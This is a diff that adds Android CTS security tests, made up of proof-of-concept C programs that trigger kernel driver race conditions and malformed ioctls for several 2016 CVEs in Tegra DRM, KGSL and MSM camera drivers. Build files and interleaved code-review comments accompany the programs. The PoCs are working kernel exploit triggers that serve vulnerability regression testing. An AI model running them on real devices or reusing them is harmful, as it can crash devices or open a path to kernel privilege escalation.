+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
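Review bot: The `while(1)` loop in `main` has no exit, so the `pthread_join` loop and the `out_dev:` cleanup after it are unreachable, and every pass that gets past `DRM_IOCTL_TEGRA_GEM_CREATE` starts a `submit_thread` whose id overwrites the previous one without being joined or detached. The binary therefore only stops when the harness kills it, and thread resources accumulate until `pthread_create` begins to fail, which goes unnoticed because its return value is not checked. I would bound the loop, e.g. `for(try_time = 0; try_time < MAX_TRIES; try_time++){` with `MAX_TRIES` a new constant (name constructed for this note), and move the `pthread_join(submit_thread_id[i], NULL);` loop inside it after the `DRM_IOCTL_GEM_CLOSE` loop. Separately, `ERR` calls `strerror` without `<string.h>` being included, and neither `LOG` nor `ERR` is used, so the empty `if(ret == -1){ }` in `set_affinity` and the `open` failure path are silent.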
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
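Review bot: The warning and hardening flags on the `CFLAGS +=` lines and `LDFLAGS += -rdynamic` are assigned to plain make variables rather than the module's `LOCAL_CFLAGS` / `LOCAL_LDFLAGS`, so as far as this file shows they are not attached to the `CVE-2016-8434` module; only `LOCAL_LDFLAGS += -fPIE -pie` is. If `-Wall -W`, `-Wformat=2`, `-Wstrict-prototypes` and `-D_FORTIFY_SOURCE=2` are meant to apply to `poc.c`, write them as `LOCAL_CFLAGS += ...` and expect new warnings from the source once they take effect (several functions there are non-static and declared with empty parameter lists). `-Iinclude` names a directory this change does not add and would normally be expressed through `LOCAL_C_INCLUDES`. The `Android.mk` files added for CVE-2016-8435, CVE-2016-8444 and CVE-2016-8448 repeat the same lines and need the same change.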
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
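Review bot: `trigger_kgsl_create_drawctx` leaves `struct kgsl_drawctxt_create ctx` partly uninitialised and ignores the `ioctl` result, so when the call fails `ctx.drawctxt_id` is indeterminate stack data that is printed and then stored in `g_ctx_id`; the `errno` it prints can also be stale from an earlier call. Declare it as `struct kgsl_drawctxt_create ctx = { 0 };` and assign `g_ctx_id` only when `ioctl(...)` returns 0, with `main` returning early otherwise. The same unchecked pattern applies to `malloc(0x1000)` in `main`, whose result is dereferenced as `*(int*)g_event.priv` in `trigger_kgsl_timestamp_event`. The descriptor number in `close(4)` inside `race_thread` is a bare literal; a one-line comment stating which descriptor it is expected to be would help the next maintainer.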
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
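Review bot: `DRM_IOCTL_TEGRA_CLOSE_CHANNEL` is built from `struct drm_tegra_open_channel` although `struct drm_tegra_close_channel` is declared just above it, so the size encoded in the request number is that of the open structure. This looks like a copy-paste slip, but the value has to match what the target driver defines, so confirm against the driver's header before changing it to `DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_close_channel)`; `poc.c` in this directory does not use the macro, so removing it is the simpler option. The header is also not self-contained: it uses `__u32`, `__u64` and `_IOWR` without including `<linux/types.h>` or `<sys/ioctl.h>`. The `SIOCIWFIRSTPRIV` / `PRIV_CMD_*` defines and the `tegra_drm_client*` structures are not referenced by the PoC and could be dropped.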
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
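Review bot: The fill loop starts at `i = 1`, so `syncpts[0]` keeps its zero initialiser while `submit_c.num_syncpts` is set to `SYN_NUM`; nothing in the file says whether skipping the first entry is deliberate. If it is, add a comment such as `/* entry 0 intentionally left zeroed: <reason> */`, otherwise start the loop at 0. The literals `192` and `0xffff` would likewise be easier to maintain as named constants with a comment saying what condition the test checks. `main` returns 0 both when `open(DEV, ...)` fails and after the submit call, so the exit status cannot tell the harness whether the ioctl path was exercised at all.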
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
